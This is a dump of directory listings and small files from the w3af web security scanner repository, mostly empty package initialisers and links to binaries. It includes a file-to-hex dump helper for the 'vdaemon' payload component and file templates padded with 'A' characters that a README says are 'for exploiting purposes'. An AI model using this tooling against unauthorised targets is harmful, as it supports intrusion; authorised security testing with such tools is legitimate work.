| data = cs.recv(1024) 14 | if not data: 15 | break 16 | f.write(data) 17 | 18 | cs.close() 19 | f.close() 20 | -------------------------------------------------------------------------------- /w3af/core/controllers/plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/plugins/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/scan_log_analysis/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/data/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/scan_log_analysis/data/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/graphs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/scan_log_analysis/graphs/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/main/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/scan_log_analysis/main/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/scan_log_analysis/utils/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/scan_log_analysis/utils/graph.py: -------------------------------------------------------------------------------- 1 | def num_formatter(val, chars, delta, left=False): 2 | align = '<' if left else '' 3 | return '{:{}{}d}'.format(int(val), align, chars) 4 | -------------------------------------------------------------------------------- /w3af/core/controllers/profiling/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/profiling/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/sca/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/sca/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/sca/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/sca/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/sql_tools/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/sql_tools/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/tests/core_test_suite/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/tests/core_test_suite/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/tests/pylint_plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/tests/pylint_plugins/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/threads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/threads/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/threads/decorators.py: -------------------------------------------------------------------------------- 1 | from tblib.decorators import return_error 2 | 3 | 4 | @return_error 5 | def apply_with_return_error(args): 6 | """ 7 | :see: https://github.com/ionelmc/python-tblib/issues/4 8 | """ 9 | return args[0](*args[1:]) 10 | -------------------------------------------------------------------------------- /w3af/core/controllers/threads/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/threads/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/vdaemon/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/vdaemon/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/vdaemon/dump.py: -------------------------------------------------------------------------------- 1 | if __name__ == "__main__": 2 | import sys 3 | res = "file_dump = '" 4 | 5 | for i in file(sys.argv[1]).read(): 6 | res += '\\x' + hex(ord(i))[2:].zfill(2) 7 | 8 | res += "'" 9 | print res 10 | -------------------------------------------------------------------------------- /w3af/core/controllers/vdaemon/pe_template.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/vdaemon/pe_template.dat -------------------------------------------------------------------------------- /w3af/core/controllers/w3afAgent/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/w3afAgent/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/w3afAgent/client/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/w3afAgent/client/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/w3afAgent/server/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/w3afAgent/server/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/websocket/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/wizard/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/wizard/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/wizard/questions/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/wizard/questions/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/wizard/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/wizard/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/wizard/wizards/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/wizard/wizards/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/__init__.py: -------------------------------------------------------------------------------- 1 | # Translation hack. Needed for tests completion. 2 | try: 3 | _('blah') 4 | except: 5 | import __builtin__ 6 | __builtin__.__dict__['_'] = lambda x: x 7 | -------------------------------------------------------------------------------- /w3af/core/data/bloomfilter/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/bloomfilter/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/bloomfilter/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/bloomfilter/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/constants/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/README: -------------------------------------------------------------------------------- 1 | This directory stores templates of files. A template is a simple file with 2 | the corresponding "magic cookie" that identifies it. 3 | 4 | Files have comments filled with 'A'*240. This is for exploiting purposes. 5 | -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/file_templates/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/file_templates/template.bmp -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/file_templates/template.gif -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.html: -------------------------------------------------------------------------------- 1 | 2 | w3af template 3 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 4 | -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/file_templates/template.jpg -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/constants/file_templates/template.png -------------------------------------------------------------------------------- /w3af/core/data/constants/file_templates/template.txt: -------------------------------------------------------------------------------- 1 | w3af template file for txt 2 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /w3af/core/data/constants/version.txt: -------------------------------------------------------------------------------- 1 | 2019.1.2 2 | -------------------------------------------------------------------------------- /w3af/core/data/context/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/context/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/context/context/__init__.py: -------------------------------------------------------------------------------- 1 | from .main import get_context, get_context_iter 2 | -------------------------------------------------------------------------------- /w3af/core/data/context/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/db/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/db/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/db/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/db/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/dc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/dc/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/dc/generic/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/dc/generic/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/dc/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/dc/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/dc/tests/samples/post-data-3570: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/dc/tests/samples/post-data-3570 -------------------------------------------------------------------------------- /w3af/core/data/dc/utils/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/dc/utils/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/export/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/export/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/fuzzer/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/fuzzer/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/fuzzer/mutants/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/fuzzer/mutants/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/fuzzer/mutants/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/kb/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/data/kb/tests/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/data/kb/vuln_templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/kb/vuln_templates/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/misc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/misc/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/misc/constants/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/misc/constants/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/misc/tests/test_dir/README.md: -------------------------------------------------------------------------------- 1 | Do not remove. This directory is here for testing test_file_utils.py 2 | -------------------------------------------------------------------------------- /w3af/core/data/nltk_wrapper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/nltk_wrapper/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/options/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/options/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/options/tests/test.txt: -------------------------------------------------------------------------------- 1 | abc 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/open_api/__init__.py: -------------------------------------------------------------------------------- 1 | from .main import OpenAPI 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/open_api/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/open_api/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/complex-form.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/complex-form.html -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/links.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/links.pdf -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/pickle-8748.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/pickle-8748.htm -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/subscribe.bytecode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/subscribe.bytecode -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/subscribe.flr: -------------------------------------------------------------------------------- 1 | movie 'subscribe.swf' { 2 | // flash 6, total frames: 1, frame rate: 30 fps, 125x50 px, compressed 3 | 4 | movieClip 12 { 5 | 6 | frame 70 { 7 | stop(); 8 | } 9 | } 10 | 11 | button 13 { 12 | 13 | on (release) { 14 | getURL('subscribe.aspx', ''); 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/subscribe.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/subscribe.swf -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/test-5925-1.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/test-5925-1.swf -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/test-5925-2.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/test-5925-2.swf -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/uncompress-swf.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import zlib 3 | 4 | if __name__ == '__main__': 5 | filename = sys.argv[1] 6 | 7 | compressed_data = file(filename).read()[8:] 8 | uncompressed_data = zlib.decompress(compressed_data) 9 | 10 | output_file = '%s.bytecode' % filename 11 | file(output_file, 'w').write(uncompressed_data) 12 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/wivet1.bytecode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/wivet1.bytecode -------------------------------------------------------------------------------- /w3af/core/data/parsers/doc/tests/data/wivet1.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/doc/tests/data/wivet1.swf -------------------------------------------------------------------------------- /w3af/core/data/parsers/ipc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/ipc/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/tests/data/test_1.js: -------------------------------------------------------------------------------- 1 | // http://www.w3schools.com/js/tryit.asp?filename=tryjs_create_object1 2 | 3 | var person = {firstname:"John", lastname:"Doe", age:50, eyecolor:"blue"} 4 | var elem = document.getElementById("demo"); 5 | elem.innerHTML = person.firstname + " is " + person.age + " years old."; -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/tests/data/test_3.js: -------------------------------------------------------------------------------- 1 | // http://www.w3schools.com/js/tryit.asp?filename=tryjs_ifthenelse 2 | function myFunction() 3 | { 4 | var x=""; 5 | var time=new Date().getHours(); 6 | if (time<20) 7 | { 8 | x="Good day"; 9 | } 10 | else 11 | { 12 | x="Good evening"; 13 | } 14 | document.getElementById("demo").innerHTML=x; 15 | } -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/tests/data/test_4.js: -------------------------------------------------------------------------------- 1 | document.location = '/spam.html'; 2 | document.location = "/eggs.html"; 3 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/pynarcissus/tests/data/test_full_url.js: -------------------------------------------------------------------------------- 1 | document.location = 'http://moth/spam.html'; 2 | document.location = "http://moth/eggs.html"; 3 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/parsers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/parsers/utils/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/parsers/utils/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/data/profile/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/profile/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/profile/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pedro' 2 | -------------------------------------------------------------------------------- /w3af/core/data/quick_match/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/quick_match/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/quick_match/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/quick_match/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/request/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/request/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/request/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/request/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/search_engines/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/search_engines/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/search_engines/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/search_engines/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/serialization/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/serialization/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/statistics/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/statistics/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/statistics/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/statistics/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/handlers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/handlers/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/handlers/cache_backend/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/handlers/cache_backend/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/handlers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/handlers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/openssl_wrapper/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/url/openssl_wrapper/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/data/url/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/tests/helpers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/tests/helpers/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/url/tests/helpers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/url/tests/helpers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/user_agent/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/user_agent/__init__.py -------------------------------------------------------------------------------- /w3af/core/data/visualization/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/data/visualization/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/ui/api/__init__.py: -------------------------------------------------------------------------------- 1 | from .utils.mp_flask import ThreadedFlask 2 | app = ThreadedFlask('w3af') 3 | 4 | from . import app 5 | from . import middlewares 6 | from . import resources -------------------------------------------------------------------------------- /w3af/core/ui/api/db/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pedro' 2 | -------------------------------------------------------------------------------- /w3af/core/ui/api/middlewares/__init__.py: -------------------------------------------------------------------------------- 1 | from . import security_headers 2 | from . import require_json 3 | -------------------------------------------------------------------------------- /w3af/core/ui/api/resources/__init__.py: -------------------------------------------------------------------------------- 1 | from . import kb 2 | from . import scans 3 | from . import error_handlers 4 | from . import index 5 | from . import version 6 | from . import traffic 7 | from . import exceptions 8 | from . import log 9 | from . import urls 10 | from . import fuzzable_requests -------------------------------------------------------------------------------- /w3af/core/ui/api/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/ui/api/tests/utils/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/ui/api/utils/__init__.py: -------------------------------------------------------------------------------- 1 | 